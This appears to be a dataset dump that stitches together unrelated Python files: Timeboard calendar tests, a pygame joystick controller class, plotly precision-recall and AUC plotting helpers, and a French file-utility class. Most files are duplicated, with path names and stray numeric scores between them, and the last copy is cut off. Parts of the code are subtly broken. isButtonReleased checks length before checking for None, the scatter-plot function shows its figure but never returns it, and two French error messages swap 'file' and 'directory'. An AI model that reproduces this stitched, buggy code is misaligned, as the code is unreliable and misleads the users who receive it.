clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1])
assert clnd._timeline.labels.eq([1]*12).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_empty_layout(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[],
)
assert clnd._timeline.labels.isnull().all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_empty_layout_with_default_label(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[],
default_label=100)
assert clnd._timeline.labels.eq([100]*12).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_trivial_with_amendments(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments={'11 Jan 2017': 2,
'12 Jan 2017': 3})
assert clnd._timeline.labels.eq([1]*10 + [2,3]).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_amendments_outside(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments={'31 Dec 2016': 2,
'12 Jan 2017': 3})
assert clnd._timeline.labels.eq([1]*11 + [3]).all()
assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
def test_tb_constructor_bad_layout(self):
with pytest.raises(TypeError):
tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=1)
def test_tb_constructor_duplicate_amendments(self):
with pytest.raises(KeyError):
tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments={'02 Jan 2017 12:00': 2,
'02 Jan 2017 15:15': 3})
def test_tb_constructor_bad_amendments(self):
with pytest.raises(TypeError):
tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[1],
amendments=[0])
def test_tb_constructor_trivial_selector(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
sdl = clnd.default_schedule
selector = clnd.default_selector
assert selector(clnd._timeline[1])
assert [selector(x) for x in clnd._timeline.labels] == [False, True] * 6
assert (sdl.on_duty_index == [1, 3, 5, 7, 9, 11]).all()
assert (sdl.off_duty_index == [0, 2, 4, 6, 8, 10]).all()
def test_tb_constructor_trivial_custom_selector(self):
def custom_selector(x):
return x>1
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2],
default_selector=custom_selector)
sdl = clnd.default_schedule
selector = clnd.default_selector
assert not selector(clnd._timeline[1])
assert [selector(x) for x in clnd._timeline.labels] == [False, False,
False, True] * 3
assert (sdl.on_duty_index == [3, 7, 11]).all()
assert (sdl.off_duty_index == [0, 1, 2, 4, 5, 6, 8, 9, 10]).all()
class TestTBConstructorWithOrgs(object):
def test_tb_constructor_week5x8(self):
week5x8 = tb.Organizer(marker='W', structure=[[1, 1, 1, 1, 1, 0, 0]])
amendments = pd.Series(index=pd.date_range(start='01 Jan 2017',
end='10 Jan 2017',
freq='D'),
data=0).to_dict()
clnd = tb.Timeboard(base_unit_freq='D',
start='28 Dec 2016', end='02 Apr 2017',
layout=week5x8,
amendments=amendments)
assert clnd.start_time == datetime.datetime(2016, 12, 28, 0, 0, 0)
assert clnd.end_time > datetime.datetime(2017, 4, 2, 23, 59, 59)
assert clnd.end_time < datetime.datetime(2017, 4, 3, 0, 0, 0)
assert clnd.base_unit_freq == 'D'
assert clnd('28 Dec 2016').is_on_duty()
assert clnd('30 Dec 2016').is_on_duty()
assert clnd('31 Dec 2016').is_off_duty()
assert clnd('01 Jan 2017').is_off_duty()
assert clnd('10 Jan 2017').is_off_duty()
assert clnd('11 Jan 2017').is_on_duty()
assert clnd('27 Mar 2017').is_on_duty()
assert clnd('31 Mar 2017').is_on_duty()
assert clnd('01 Apr 2017').is_off_duty()
assert clnd('02 Apr 2017').is_off_duty()
class TestTimeboardSchedules(object):
def test_tb_add_schedule(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
#layout=[0, 1, 0, 0, 2, 0])
layout=['O', 'A', 'O', 'O', 'B', 'O'])
assert len(clnd.schedules) == 1
assert 'on_duty' in clnd.schedules
clnd.add_schedule(name='sdl1', selector=lambda x: x == 'B')
clnd.add_schedule(name='sdl2', selector=lambda x: x == 'C')
assert len(clnd.schedules) == 3
assert 'sdl1' in clnd.schedules
sdl1 = clnd.schedules['sdl1']
assert sdl1.name == 'sdl1'
assert not sdl1.is_on_duty(1)
assert sdl1.is_on_duty(4)
assert 'sdl2' in clnd.schedules
sdl2 = clnd.schedules['sdl2']
assert sdl2.name == 'sdl2'
assert not sdl2.is_on_duty(1)
assert not sdl2.is_on_duty(4)
assert clnd.default_schedule.name == 'on_duty'
assert clnd.default_schedule.is_on_duty(1)
assert clnd.default_schedule.is_on_duty(4)
def test_tb_drop_schedule(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
clnd.add_schedule(name='sdl', selector=lambda x: x > 1)
assert len(clnd.schedules) == 2
sdl = clnd.schedules['sdl']
clnd.drop_schedule(sdl)
assert len(clnd.schedules) == 1
with pytest.raises(KeyError):
clnd.schedules['sdl']
# object itself continues to exists while referenced
assert not sdl.is_on_duty(1)
def test_tb_schedule_names(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
clnd.add_schedule(name=1, selector=lambda x: x > 1)
assert len(clnd.schedules) == 2
assert clnd.schedules['1'].name == '1'
with pytest.raises(KeyError):
clnd.add_schedule(name='1', selector=lambda x: x > 2)
def test_tb_bad_schedule(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
with pytest.raises((ValueError, AttributeError)):
clnd.add_schedule(name='sdl', selector='selector')
with pytest.raises(TypeError):
clnd.add_schedule(name='sdl', selector=lambda x,y: x+y)
class TestTimeboardWorktime(object):
def test_tb_default_worktime_source(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0])
assert clnd.worktime_source == 'duration'
def test_tb_set_worktime_source(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0],
worktime_source='labels')
assert clnd.worktime_source == 'labels'
def test_tb_bad_worktime_source(self):
with pytest.raises(ValueError):
tb.Timeboard(base_unit_freq='D',
start='31 Dec 2016', end='12 Jan 2017',
layout=[0, 1, 0, 0, 2, 0],
worktime_source='bad_source')
#TODO: test timeboards with multiplied freqs
class TestTimeboardToDataFrame(object):
def test_timeboard_to_dataframe(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
clnd.add_schedule('my_schedule', lambda x: True)
df = clnd.to_dataframe()
assert len(df) == 12
# we are not hardcoding the list of columns here;
# however, there must be at least 5 columns: two showing the start
# and the end times of workshifts, one for the labels,
# and two for the schedules
assert len(list(df.columns)) >=5
assert 'my_schedule' in list(df.columns)
def test_timeboard_to_dataframe_selected_ws(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
df = clnd.to_dataframe(1, 5)
assert len(df) == 5
def test_timeboard_to_dataframe_reversed_ws(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
# This is ok. This way an empty df for a void interval is created.
df = clnd.to_dataframe(5, 1)
assert df.empty
def test_timeboard_to_dataframe_bad_locations(self):
clnd = tb.Timeboard(base_unit_freq='D',
start='01 Jan 2017', end='12 Jan 2017',
layout=[0, 1, 0, 2])
with pytest.raises(AssertionError):
clnd.to_dataframe(1, 12)
with pytest.raises(AssertionError):
clnd.to_dataframe(12, 1)
with pytest.raises(AssertionError):
clnd.to_dataframe(-1, 5)
with pytest.raises(AssertionError):
clnd.to_dataframe(5, -1) | 0.622459 | 0.616157 |
import pygame
class Controller:
def __init__(self, number):
self.number = number
self.joystick = None
if number <= pygame.joystick.get_count()-1:
self.joystick = pygame.joystick.Joystick(number)
self.joystick.init()
self.name = self.joystick.get_name()
self.previousButtons = None
self.currentButtons = None
self.previousAxes = None
self.currentAxes = None
self.previousHats = None
self.currentHats = None
def processInput(self):
if self.joystick is None:
return
self.previousButtons = self.currentButtons
self.currentButtons = []
for b in range(self.joystick.get_numbuttons()):
self.currentButtons.append(self.joystick.get_button(b))
self.previousAxes = self.currentAxes
self.currentAxes = []
for a in range(self.joystick.get_numaxes()):
self.currentAxes.append(self.joystick.get_axis(a))
self.previousHats = self.currentHats
self.currentHats = []
for h in range(self.joystick.get_numhats()):
self.currentHats.append(self.joystick.get_hat(h))
def isButtonDown(self, controllerInput):
if self.currentButtons is None:
return False
if len(self.currentButtons) <= controllerInput.inputNumber:
return False
return self.currentButtons[controllerInput.inputNumber] >= controllerInput.threshhold
def isButtonPressed(self, controllerInput):
if self.currentButtons is None or self.previousButtons is None:
return False
if len(self.currentButtons) <= controllerInput.inputNumber:
return False
return self.currentButtons[controllerInput.inputNumber] >= controllerInput.threshhold and self.previousButtons[controllerInput.inputNumber] < controllerInput.threshhold
def isButtonReleased(self, controllerInput):
if len(self.currentButtons) <= controllerInput.inputNumber:
return False
if self.currentButtons is None or self.previousButtons is None:
return False
return self.currentButtons[controllerInput.inputNumber] <= controllerInput.threshhold and self.previousButtons[controllerInput.inputNumber] > controllerInput.threshhold
def isHatDown(self, controllerInput):
if self.currentHats is None:
return False
if len(self.currentHats) <= controllerInput.inputNumber[0]:
return False
if controllerInput.threshhold > 0:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] >= controllerInput.threshhold
else:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] <= controllerInput.threshhold
def isHatPressed(self, controllerInput):
if self.currentHats is None or self.previousHats is None:
return False
if len(self.currentHats) <= controllerInput.inputNumber[0]:
return False
if controllerInput.threshhold > 0:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] >= controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] < controllerInput.threshhold
else:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] <= controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] > controllerInput.threshhold
def isHatReleased(self, controllerInput):
if self.currentHats is None or self.previousHats is None:
return False
if len(self.currentHats) <= controllerInput.inputNumber[0]:
return False
if controllerInput.threshhold > 0:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] < controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] >= controllerInput.threshhold
else:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] > controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] <= controllerInput.threshhold
def isAxisDown(self, controllerInput):
if self.currentAxes is None:
return False
if len(self.currentAxes) <= controllerInput.inputNumber:
return False
if controllerInput.threshhold > 0:
return self.currentAxes[controllerInput.inputNumber] >= controllerInput.threshhold
else:
return self.currentAxes[controllerInput.inputNumber] <= controllerInput.threshhold
def isAxisPressed(self, controllerInput):
if self.currentAxes is None or self.previousAxes is None:
return False
if len(self.currentAxes) <= controllerInput.inputNumber:
return False
if controllerInput.threshhold > 0:
return self.currentAxes[controllerInput.inputNumber] >= controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] < controllerInput.threshhold
else:
return self.currentAxes[controllerInput.inputNumber] <= controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] > controllerInput.threshhold
def isAxisReleased(self, controllerInput):
if self.currentAxes is None or self.previousAxes is None:
return False
if len(self.currentAxes) <= controllerInput.inputNumber:
return False
if controllerInput.threshhold > 0:
return self.currentAxes[controllerInput.inputNumber] < controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] >= controllerInput.threshhold
else:
return self.currentAxes[controllerInput.inputNumber] > controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] <= controllerInput.threshhold | gamma/controller.py | import pygame
class Controller:
def __init__(self, number):
self.number = number
self.joystick = None
if number <= pygame.joystick.get_count()-1:
self.joystick = pygame.joystick.Joystick(number)
self.joystick.init()
self.name = self.joystick.get_name()
self.previousButtons = None
self.currentButtons = None
self.previousAxes = None
self.currentAxes = None
self.previousHats = None
self.currentHats = None
def processInput(self):
if self.joystick is None:
return
self.previousButtons = self.currentButtons
self.currentButtons = []
for b in range(self.joystick.get_numbuttons()):
self.currentButtons.append(self.joystick.get_button(b))
self.previousAxes = self.currentAxes
self.currentAxes = []
for a in range(self.joystick.get_numaxes()):
self.currentAxes.append(self.joystick.get_axis(a))
self.previousHats = self.currentHats
self.currentHats = []
for h in range(self.joystick.get_numhats()):
self.currentHats.append(self.joystick.get_hat(h))
def isButtonDown(self, controllerInput):
if self.currentButtons is None:
return False
if len(self.currentButtons) <= controllerInput.inputNumber:
return False
return self.currentButtons[controllerInput.inputNumber] >= controllerInput.threshhold
def isButtonPressed(self, controllerInput):
if self.currentButtons is None or self.previousButtons is None:
return False
if len(self.currentButtons) <= controllerInput.inputNumber:
return False
return self.currentButtons[controllerInput.inputNumber] >= controllerInput.threshhold and self.previousButtons[controllerInput.inputNumber] < controllerInput.threshhold
def isButtonReleased(self, controllerInput):
if len(self.currentButtons) <= controllerInput.inputNumber:
return False
if self.currentButtons is None or self.previousButtons is None:
return False
return self.currentButtons[controllerInput.inputNumber] <= controllerInput.threshhold and self.previousButtons[controllerInput.inputNumber] > controllerInput.threshhold
def isHatDown(self, controllerInput):
if self.currentHats is None:
return False
if len(self.currentHats) <= controllerInput.inputNumber[0]:
return False
if controllerInput.threshhold > 0:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] >= controllerInput.threshhold
else:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] <= controllerInput.threshhold
def isHatPressed(self, controllerInput):
if self.currentHats is None or self.previousHats is None:
return False
if len(self.currentHats) <= controllerInput.inputNumber[0]:
return False
if controllerInput.threshhold > 0:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] >= controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] < controllerInput.threshhold
else:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] <= controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] > controllerInput.threshhold
def isHatReleased(self, controllerInput):
if self.currentHats is None or self.previousHats is None:
return False
if len(self.currentHats) <= controllerInput.inputNumber[0]:
return False
if controllerInput.threshhold > 0:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] < controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] >= controllerInput.threshhold
else:
return self.currentHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] > controllerInput.threshhold and self.previousHats[controllerInput.inputNumber[0]][controllerInput.inputNumber[1]] <= controllerInput.threshhold
def isAxisDown(self, controllerInput):
if self.currentAxes is None:
return False
if len(self.currentAxes) <= controllerInput.inputNumber:
return False
if controllerInput.threshhold > 0:
return self.currentAxes[controllerInput.inputNumber] >= controllerInput.threshhold
else:
return self.currentAxes[controllerInput.inputNumber] <= controllerInput.threshhold
def isAxisPressed(self, controllerInput):
if self.currentAxes is None or self.previousAxes is None:
return False
if len(self.currentAxes) <= controllerInput.inputNumber:
return False
if controllerInput.threshhold > 0:
return self.currentAxes[controllerInput.inputNumber] >= controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] < controllerInput.threshhold
else:
return self.currentAxes[controllerInput.inputNumber] <= controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] > controllerInput.threshhold
def isAxisReleased(self, controllerInput):
if self.currentAxes is None or self.previousAxes is None:
return False
if len(self.currentAxes) <= controllerInput.inputNumber:
return False
if controllerInput.threshhold > 0:
return self.currentAxes[controllerInput.inputNumber] < controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] >= controllerInput.threshhold
else:
return self.currentAxes[controllerInput.inputNumber] > controllerInput.threshhold and self.previousAxes[controllerInput.inputNumber] <= controllerInput.threshhold | 0.419767 | 0.091382 |
from typing import Optional
import config
import pandas as pd
import plotly.express as px
from pandas import DataFrame
from plotly.graph_objs import Figure
__all__ = [
"plot_auc_dist",
"plot_auc_scatter",
"plot_pr_curve_per_organism",
"plot_pr_scatter",
"plot_score_boxplot",
]
XRANGE = [-0.05, 1.05]
YRANGE = [-0.05, 1.05]
NBINS = 100
def plot_pr_curve_per_organism(df: DataFrame) -> Figure:
fig = px.line(
df,
x=config.label.recall,
y=config.label.precision,
color="domain",
line_group="organism",
hover_data=[config.label.auc, "domain", config.label.hmmer_hits, "e-value"],
hover_name="organism",
title="Precision-Recall curves, organism-wise",
)
fig.update_xaxes(range=XRANGE)
fig.update_yaxes(range=YRANGE)
return fig
def plot_auc_dist(df: DataFrame, per: config.Per) -> Figure:
"""
Plot AUC distribution.
Parameters
----------
df
DataFrame.
per
Per what?
"""
if per == config.Per.organism:
color: Optional[str] = "domain"
fields = ["organism", "domain"]
hover_data = [config.label.auc, config.label.hmmer_hits]
else:
color = None
hover_data = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
hover_data = list(set(hover_data))
fields = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
fields = list(set(fields))
title = f"AUC distribution, {per.name}-wise"
df = df.drop_duplicates(fields)
fig = px.histogram(
df,
x=config.label.auc,
color=color,
title=title,
marginal="rug",
hover_data=hover_data,
hover_name=per.name,
nbins=NBINS,
)
fig.update_xaxes(range=XRANGE)
return fig
def plot_auc_scatter(df: DataFrame, per: config.Per) -> Figure:
"""
Plot AUC scatter.
Parameters
----------
df
DataFrame.
per
Per what?
"""
if per == config.Per.organism:
color: Optional[str] = "domain"
hover_name = per.name
hover_data = ["domain", config.label.auc, config.label.hmmer_hits]
fields = ["organism", "domain"]
else:
color = None
hover_name = per.name
hover_data = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
fields = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
fields = list(set(fields))
df = df.drop_duplicates(fields)
df = df.sort_values(config.label.auc)
title = f"AUC scatter, {per.name}-wise"
fig = px.scatter(
df,
x=per.name,
y=config.label.auc,
color=color,
title=title,
hover_data=hover_data,
hover_name=hover_name,
marginal_y="violin",
)
fig.update_layout(showlegend=False)
fig.update_yaxes(range=YRANGE)
return fig
def plot_score_boxplot(dfe: DataFrame, per: config.Per) -> Figure:
"""
Plot score bloxplot.
Parameters
----------
df
DataFrame.
per
Per what?
"""
precision = dfe.copy()
precision["value"] = precision[config.label.precision]
del precision[config.label.precision]
precision["score"] = "precision"
recall = dfe.copy()
recall["value"] = recall[config.label.recall]
del recall[config.label.recall]
recall["score"] = "recall"
f1score = dfe.copy()
f1score["value"] = f1score[config.label.f1score]
del f1score[config.label.f1score]
f1score["score"] = config.label.f1score
if per == config.Per.organism:
fields = ["organism", "domain"]
hover_data = [
"organism",
"domain",
config.label.auc,
config.label.hmmer_hits,
]
else:
hover_data = [
per.name,
"clan",
config.label.auc,
config.label.hmmer_hits,
]
hover_data = list(set(hover_data))
fields = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
fields = list(set(fields))
dfe = pd.concat([precision, recall, f1score])
title = f"Score boxplot, {per.name}-wise"
fig = px.box(
dfe,
x="-log10(e-value)",
color="score",
y="value",
title=title,
hover_name=per.name,
hover_data=hover_data,
)
fig.update_yaxes(range=YRANGE)
return fig
def plot_pr_scatter(dfe: DataFrame, per: config.Per, size_max: int) -> Figure:
"""
Plot Precision-Recall scatter.
Parameters
----------
df
DataFrame.
per
Per what?
"""
if per == config.Per.organism:
color: Optional[str] = "domain"
hover_data = [
"organism",
"domain",
config.label.f1score,
config.label.auc,
config.label.hmmer_hits,
]
else:
color = None
hover_data = [
per.name,
"clan",
config.label.f1score,
config.label.auc,
config.label.hmmer_hits,
]
title = f"Precision vs Recall, {per.name}-wise"
fig = px.scatter(
dfe,
x=config.label.recall,
y=config.label.precision,
animation_frame="e-value",
color=color,
title=title,
size=config.label.hmmer_hits,
size_max=size_max,
hover_data=hover_data,
hover_name=per.name,
)
fig.update_layout(showlegend=False)
fig.update_xaxes(range=XRANGE)
fig.update_yaxes(range=YRANGE)
fig.show() | iseq_prof_analysis/baseline/plot.py | from typing import Optional
import config
import pandas as pd
import plotly.express as px
from pandas import DataFrame
from plotly.graph_objs import Figure
__all__ = [
"plot_auc_dist",
"plot_auc_scatter",
"plot_pr_curve_per_organism",
"plot_pr_scatter",
"plot_score_boxplot",
]
XRANGE = [-0.05, 1.05]
YRANGE = [-0.05, 1.05]
NBINS = 100
def plot_pr_curve_per_organism(df: DataFrame) -> Figure:
fig = px.line(
df,
x=config.label.recall,
y=config.label.precision,
color="domain",
line_group="organism",
hover_data=[config.label.auc, "domain", config.label.hmmer_hits, "e-value"],
hover_name="organism",
title="Precision-Recall curves, organism-wise",
)
fig.update_xaxes(range=XRANGE)
fig.update_yaxes(range=YRANGE)
return fig
def plot_auc_dist(df: DataFrame, per: config.Per) -> Figure:
"""
Plot AUC distribution.
Parameters
----------
df
DataFrame.
per
Per what?
"""
if per == config.Per.organism:
color: Optional[str] = "domain"
fields = ["organism", "domain"]
hover_data = [config.label.auc, config.label.hmmer_hits]
else:
color = None
hover_data = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
hover_data = list(set(hover_data))
fields = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
fields = list(set(fields))
title = f"AUC distribution, {per.name}-wise"
df = df.drop_duplicates(fields)
fig = px.histogram(
df,
x=config.label.auc,
color=color,
title=title,
marginal="rug",
hover_data=hover_data,
hover_name=per.name,
nbins=NBINS,
)
fig.update_xaxes(range=XRANGE)
return fig
def plot_auc_scatter(df: DataFrame, per: config.Per) -> Figure:
"""
Plot AUC scatter.
Parameters
----------
df
DataFrame.
per
Per what?
"""
if per == config.Per.organism:
color: Optional[str] = "domain"
hover_name = per.name
hover_data = ["domain", config.label.auc, config.label.hmmer_hits]
fields = ["organism", "domain"]
else:
color = None
hover_name = per.name
hover_data = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
fields = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
fields = list(set(fields))
df = df.drop_duplicates(fields)
df = df.sort_values(config.label.auc)
title = f"AUC scatter, {per.name}-wise"
fig = px.scatter(
df,
x=per.name,
y=config.label.auc,
color=color,
title=title,
hover_data=hover_data,
hover_name=hover_name,
marginal_y="violin",
)
fig.update_layout(showlegend=False)
fig.update_yaxes(range=YRANGE)
return fig
def plot_score_boxplot(dfe: DataFrame, per: config.Per) -> Figure:
"""
Plot score bloxplot.
Parameters
----------
df
DataFrame.
per
Per what?
"""
precision = dfe.copy()
precision["value"] = precision[config.label.precision]
del precision[config.label.precision]
precision["score"] = "precision"
recall = dfe.copy()
recall["value"] = recall[config.label.recall]
del recall[config.label.recall]
recall["score"] = "recall"
f1score = dfe.copy()
f1score["value"] = f1score[config.label.f1score]
del f1score[config.label.f1score]
f1score["score"] = config.label.f1score
if per == config.Per.organism:
fields = ["organism", "domain"]
hover_data = [
"organism",
"domain",
config.label.auc,
config.label.hmmer_hits,
]
else:
hover_data = [
per.name,
"clan",
config.label.auc,
config.label.hmmer_hits,
]
hover_data = list(set(hover_data))
fields = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
fields = list(set(fields))
dfe = pd.concat([precision, recall, f1score])
title = f"Score boxplot, {per.name}-wise"
fig = px.box(
dfe,
x="-log10(e-value)",
color="score",
y="value",
title=title,
hover_name=per.name,
hover_data=hover_data,
)
fig.update_yaxes(range=YRANGE)
return fig
def plot_pr_scatter(dfe: DataFrame, per: config.Per, size_max: int) -> Figure:
"""
Plot Precision-Recall scatter.
Parameters
----------
df
DataFrame.
per
Per what?
"""
if per == config.Per.organism:
color: Optional[str] = "domain"
hover_data = [
"organism",
"domain",
config.label.f1score,
config.label.auc,
config.label.hmmer_hits,
]
else:
color = None
hover_data = [
per.name,
"clan",
config.label.f1score,
config.label.auc,
config.label.hmmer_hits,
]
title = f"Precision vs Recall, {per.name}-wise"
fig = px.scatter(
dfe,
x=config.label.recall,
y=config.label.precision,
animation_frame="e-value",
color=color,
title=title,
size=config.label.hmmer_hits,
size_max=size_max,
hover_data=hover_data,
hover_name=per.name,
)
fig.update_layout(showlegend=False)
fig.update_xaxes(range=XRANGE)
fig.update_yaxes(range=YRANGE)
fig.show() | 0.947332 | 0.3694 |
import os
from pathlib import Path
import shutil
"""------[ Class ]---------"""
class UtilsFichier():
def __init__(self, repertoire='', fichier=''):
self.c_fic = fichier
self.c_dir = repertoire
def isCheminExiste(self, c_dir="") -> bool:
"""Test si le répertoire existe."""
if not os.path.exists(c_dir):
print("Le fichier n'existe pas ou est introuvable.")
return False
else:
return True
def isFichierExiste(self, c_fic, c_dir="") -> bool:
"""Test si le fichier existe."""
if not os.path.isfile(os.path.join(c_dir, c_fic)):
print("Le répertoire n'existe pas ou est introuvable.")
return False
else:
return True
def FichierExiste(self, c_fic, c_dir):
if not (os.path.exists(os.path.join(c_dir, c_fic)) and os.path.isfile(os.path.join(c_dir, c_fic))):
print("Le fichier ou le répertoire n'existe pas ou est introuvable.")
# sys.exit()
else:
return True
# Lecture du fichier de configuration
def ChargeFic(self, c_fic, c_dir):
try:
file = open(os.path.join(c_dir, c_fic))
result = file.read()
file.close()
return result
except OSError:
# print(e, file=sys.stderr)
err = "Fichier non trouvé"
print("\n")
print("Impossible de Lire le Fichier ({}), le script se termine.".format(err))
print("\n")
# sys.exit(1)
except Exception as ex:
print(ex)
print("Impossible de continuer (%s), le script se termine.")
# TODO: A ajouter un raise
quit()
def CreerRep(self, c_dir):
"""Creation du repertoire output directory si manquant.
a voir :
Path('/my/directory').mkdir(mode=0o777, parents=True, exist_ok=True)
This recursively creates the directory and does not raise an exception if the directory already exists.
"""
if not os.path.exists(c_dir):
os.mkdir(c_dir)
def EcritFic(self, c_fic, c_dir="", c_Content="", c_mode='w'):
"""Ecrit c_Content dans un fichier."""
if c_Content:
f = open(os.path.join(c_dir, c_fic), c_mode)
f.write(c_Content)
f.close()
def CopyFic(self, c_fic, c_ficdest):
"""Copie un fichier vers un autre."""
new_file = shutil.copy(c_fic, c_ficdest, follow_symlinks=False)
if new_file == c_ficdest:
return True
def MoveFic(self, c_fic, c_dest):
"""Move un fichier vers un autre fichier ou un répertoire."""
shutil.move(c_fic, c_dest, copy_function='copy2')
def EffaceFic(self, c_fic):
"""Effacer un Fichier."""
file_path = Path(c_fic)
file_path.unlink()
def getListRep(self, c_dir='.'):
"""Retourne la liste des répertoires présent dans c_dir."""
p = Path(c_dir)
tmp = [x for x in p.iterdir() if x.is_dir()]
cc = list()
for bcl in tmp:
cc.append(os.fspath(bcl))
return cc
def getListFile(self, c_dir='.', c_filtre='*.py'):
"""Retourne la liste des Fichiers présent dans c_dir.
Parameters
----------
c_dir : str
Le nom du répertoire source
c_filtre : str
Le filtre à appliquer
Raises
------
BaseException
Si le fqdn est incorrect, on retourne None
Returns
-------
list
une liste de strings : Nom de Fichiers
"""
p = Path(c_dir)
cc = list()
curList = list(p.glob(c_filtre))
for bcl in curList:
if bcl.is_file():
cc.append(os.fspath(bcl))
return cc | UtilsDR/utils.py |
import os
from pathlib import Path
import shutil
"""------[ Class ]---------"""
class UtilsFichier():
def __init__(self, repertoire='', fichier=''):
self.c_fic = fichier
self.c_dir = repertoire
def isCheminExiste(self, c_dir="") -> bool:
"""Test si le répertoire existe."""
if not os.path.exists(c_dir):
print("Le fichier n'existe pas ou est introuvable.")
return False
else:
return True
def isFichierExiste(self, c_fic, c_dir="") -> bool:
"""Test si le fichier existe."""
if not os.path.isfile(os.path.join(c_dir, c_fic)):
print("Le répertoire n'existe pas ou est introuvable.")
return False
else:
return True
def FichierExiste(self, c_fic, c_dir):
if not (os.path.exists(os.path.join(c_dir, c_fic)) and os.path.isfile(os.path.join(c_dir, c_fic))):
print("Le fichier ou le répertoire n'existe pas ou est introuvable.")
# sys.exit()
else:
return True
